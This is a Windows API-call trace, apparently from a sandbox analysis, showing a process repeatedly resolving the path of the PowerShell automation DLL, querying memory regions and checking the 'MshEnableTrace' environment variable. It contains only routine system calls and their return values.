	[0113.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.185] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0113.185] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0113.185] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0113.185] CoTaskMemFree (pv=0x1b8471c0) 
	[0113.186] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0113.189] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0113.189] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0113.189] CoTaskMemFree (pv=0x1b8471c0) 
	[0113.190] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0113.190] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0113.190] CoTaskMemFree (pv=0x1b8471c0) 
	[0113.191] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0113.191] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0113.191] CoTaskMemFree (pv=0x1b8471c0) 
	[0113.192] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0113.192] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0113.192] CoTaskMemFree (pv=0x1b8471c0) 
	[0113.193] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0113.193] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0113.193] CoTaskMemFree (pv=0x1b8471c0) 
	[0113.194] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0113.194] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0113.194] CoTaskMemFree (pv=0x1b8471c0) 
	[0113.195] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0113.196] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0113.322] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0113.324] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0113.324] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0113.325] CoTaskMemFree (pv=0x1b8471c0) 
	[0113.562] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b8472d0
	[0113.565] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b8473e0
	[0113.946] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.170] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.174] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.175] VirtualQuery (in: lpAddress=0xca120, lpBuffer=0xcafe0, dwLength=0x30 | out: lpBuffer=0xcafe0*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.205] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.206] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.206] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.206] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.206] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.206] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.206] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.206] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
